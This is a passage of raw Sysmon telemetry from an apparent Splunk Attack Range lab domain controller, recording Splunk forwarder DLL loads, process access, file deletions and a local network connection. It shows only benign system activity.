Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x800000000000000098919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000098898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x800000000000000098893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.046{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.047{326FD73D-C0B8-6294-350B-000000005502}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:53.578{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB62A2F8D174C1830B1A080814C1F476,SHA256=33B0B1D5776C0E824C3F696C5BD2F5499164E7C3CBF24A5118E1F56C3AFD4177,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:54.640{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71DE703122449DA4A07C38A806E400E3,SHA256=4CD1F7FC0BDC8E4C3437B5C30F84070C17FE19C87BA7074F3A6343B87DF60695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:55.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16738B7C246E0DC92475315C6A2E7D6B,SHA256=FDA9BBCB9B79D808A8723AF5EA3FCA267D08F470313B36CAA90F62CCF69CD945,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000098941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:52.020{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53320-false10.0.1.12-8000- 23542300x800000000000000098943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:56.827{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C392028293DB980272B8E42042080DB4,SHA256=B6C53A5A8837A670CAFF50A58A7A6FEDE810F15C19CE1DA5FB5769B3565DFF50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:57.921{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FD1681B044BA9718C9D4E04D1DF2D1,SHA256=81B8B12754D187C848D0C2EE2EB994111821E4A8DB6F2B7755320C1AE9BD9F3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:59.015{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087BE7BFD0530C14DCA49BE2A7D8F50B,SHA256=F969B2155D3EC91F6698A0ED70BCAB678847CA50CACCD885986DFAB1AA2379E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000098946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:00.109{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 